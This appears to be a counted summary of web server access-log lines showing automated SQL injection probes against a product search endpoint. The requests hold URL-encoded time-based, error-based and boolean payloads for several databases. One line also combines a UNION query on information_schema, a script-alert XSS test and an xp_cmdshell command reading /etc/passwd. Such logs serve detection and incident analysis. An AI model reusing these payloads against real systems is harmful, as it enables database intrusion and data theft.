   2 GET /rest/products/search?q=1 HTTP/1.1
   1 GET /rest/products/search?q=6813 HTTP/1.1
   1 GET /rest/products/search?q=5076-5075 HTTP/1.1
   1 GET /rest/products/search?q=1.9xqhL HTTP/1.1
   1 GET /rest/products/search?q=1.%22%27%28%2C.%2C%29%2C. HTTP/1.1
   1 GET /rest/products/search?q=1&QKqc=7074%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1
   1 GET /rest/products/search?q=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1
   1 GET /rest/products/search?q=1%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1
   1 GET /rest/products/search?q=1%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2869%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%2C5%29%20FROM%20DUAL-- HTTP/1.1
   1 GET /rest/products/search?q=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1
   1 GET /rest/products/search?q=1%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1
   1 GET /rest/products/search?q=1%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2869%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%2C5%29%20FROM%20DUAL-- HTTP/1.1
   1 GET /rest/products/search?q=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%289573%3D9573 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20ORDER%20BY%201--%20DtMP HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%20EXTRACTVALUE%287542%2CCONCAT%280x5c%2C0x717a6b7171%2C%28SELECT%20%28ELT%287542%3D7542%2C1%29%29%29%2C0x716a787071%29%29%20AND%20%288311%3D8311 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%209700%3D9700%20AND%20%283503%3D3503 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%208355%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%28112%29%7C%7CCHR%28105%29%7C%7CCHR%2873%29%2C5%29%20AND%20%285665%3D5665 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%205895%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285895%3D5895%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%288761%3D8761 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%204817%3D%28SELECT%204817%20FROM%20PG_SLEEP%285%29%29%20AND%20%288335%3D8335 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%204424%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284424%3D4424%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%288142%3D8142 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%203813%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29%20AND%20%289312%3D9312 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%203747%3D9627%20AND%20%288054%3D8054 HTTP/1.1
   1 GET /rest/products/search?q=1%29%20AND%20%28SELECT%208087%20FROM%20%28SELECT%28SLEEP%285%29%29%29UJRs%29%20AND%20%288391%3D8391 HTTP/1.1
   1 GET /rest/products/search?q=1%27cjocta%3C%27%22%3ETuFsMe HTTP/1.1
   1 GET /rest/products/search?q=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1
   1 GET /rest/products/search?q=1%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1
   1 GET /rest/products/search?q=1%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2869%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%2C5%29%20FROM%20DUAL-- HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2869%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%2C5%29%20FROM%20DUAL-- HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27ygOU%27%3D%27ygOU HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20ORDER%20BY%201--%20LbNt HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%20EXTRACTVALUE%287542%2CCONCAT%280x5c%2C0x717a6b7171%2C%28SELECT%20%28ELT%287542%3D7542%2C1%29%29%29%2C0x716a787071%29%29%20AND%20%28%27CLQf%27%3D%27CLQf HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%209700%3D9700%20AND%20%28%27IYGA%27%3D%27IYGA HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%208657%3D9050%20AND%20%28%27Hvrp%27%3D%27Hvrp HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%208355%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%28112%29%7C%7CCHR%28105%29%7C%7CCHR%2873%29%2C5%29%20AND%20%28%27Omxc%27%3D%27Omxc HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%205895%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285895%3D5895%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27SWvi%27%3D%27SWvi HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%204817%3D%28SELECT%204817%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27kzTd%27%3D%27kzTd HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%204424%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284424%3D4424%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27WzhD%27%3D%27WzhD HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%203813%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29%20AND%20%28%27oIhj%27%3D%27oIhj HTTP/1.1
   1 GET /rest/products/search?q=1%27%29%20AND%20%28SELECT%208087%20FROM%20%28SELECT%28SLEEP%285%29%29%29UJRs%29%20AND%20%28%27tdrG%27%3D%27tdrG HTTP/1.1
   1 GET /rest/products/search?q=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27FNMZ%27%3D%27FNMZ HTTP/1.1
   1 GET /rest/products/search?q=1%27%20ORDER%20BY%201--%20ivGK HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%20EXTRACTVALUE%287542%2CCONCAT%280x5c%2C0x717a6b7171%2C%28SELECT%20%28ELT%287542%3D7542%2C1%29%29%29%2C0x716a787071%29%29%20AND%20%27TafU%27%3D%27TafU HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%209700%3D9700%20AND%20%27IyBx%27%3D%27IyBx HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%208355%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%28112%29%7C%7CCHR%28105%29%7C%7CCHR%2873%29%2C5%29%20AND%20%27mqWF%27%3D%27mqWF HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%205895%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285895%3D5895%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27LSHE%27%3D%27LSHE HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%204817%3D%28SELECT%204817%20FROM%20PG_SLEEP%285%29%29%20AND%20%27lnJa%27%3D%27lnJa HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%204424%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284424%3D4424%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27bwGl%27%3D%27bwGl HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%203813%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29%20AND%20%27kCpa%27%3D%27kCpa HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%203798%3D2857%20AND%20%27fSuk%27%3D%27fSuk HTTP/1.1
   1 GET /rest/products/search?q=1%27%20AND%20%28SELECT%208087%20FROM%20%28SELECT%28SLEEP%285%29%29%29UJRs%29%20AND%20%27jZpL%27%3D%27jZpL HTTP/1.1
   1 GET /rest/products/search?q=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20BVfS HTTP/1.1
   1 GET /rest/products/search?q=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27 HTTP/1.1
   1 GET /rest/products/search?q=1%20ORDER%20BY%201--%20TAan HTTP/1.1
   1 GET /rest/products/search?q=1%20ORDER%20BY%201--%20GdNP HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%20EXTRACTVALUE%287542%2CCONCAT%280x5c%2C0x717a6b7171%2C%28SELECT%20%28ELT%287542%3D7542%2C1%29%29%29%2C0x716a787071%29%29--%20GMaz HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%20EXTRACTVALUE%287542%2CCONCAT%280x5c%2C0x717a6b7171%2C%28SELECT%20%28ELT%287542%3D7542%2C1%29%29%29%2C0x716a787071%29%29 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%209700%3D9700--%20jEIr HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%209700%3D9700 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%208355%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%28112%29%7C%7CCHR%28105%29%7C%7CCHR%2873%29%2C5%29--%20ImrM HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%208355%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%28112%29%7C%7CCHR%28105%29%7C%7CCHR%2873%29%2C5%29 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%206826%3D9654--%20qXOs HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%206384%3D1910 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%205895%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285895%3D5895%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20kLwR HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%205895%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285895%3D5895%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%204817%3D%28SELECT%204817%20FROM%20PG_SLEEP%285%29%29--%20kAlW HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%204817%3D%28SELECT%204817%20FROM%20PG_SLEEP%285%29%29 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%204424%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284424%3D4424%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20Lxnt HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%204424%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284424%3D4424%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%203813%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29--%20inDr HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%203813%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%283813%3D3813%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29 HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%20%28SELECT%208087%20FROM%20%28SELECT%28SLEEP%285%29%29%29UJRs%29--%20jYOJ HTTP/1.1
   1 GET /rest/products/search?q=1%20AND%20%28SELECT%208087%20FROM%20%28SELECT%28SLEEP%285%29%29%29UJRs%29 HTTP/1.1
   1 GET /rest/products/search?q=%28SELECT%20CONCAT%28CONCAT%28%27qzkqq%27%2C%28CASE%20WHEN%20%287963%3D7963%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qjxpq%27%29%29 HTTP/1.1
   1 GET /rest/products/search?q=%28SELECT%20%28CASE%20WHEN%20%288195%3D8761%29%20THEN%201%20ELSE%20%28SELECT%208761%20UNION%20SELECT%203788%29%20END%29%29 HTTP/1.1
   1 GET /rest/products/search?q=%28SELECT%20%28CASE%20WHEN%20%285972%3D5972%29%20THEN%201%20ELSE%20%28SELECT%208493%20UNION%20SELECT%202338%29%20END%29%29 HTTP/1.1
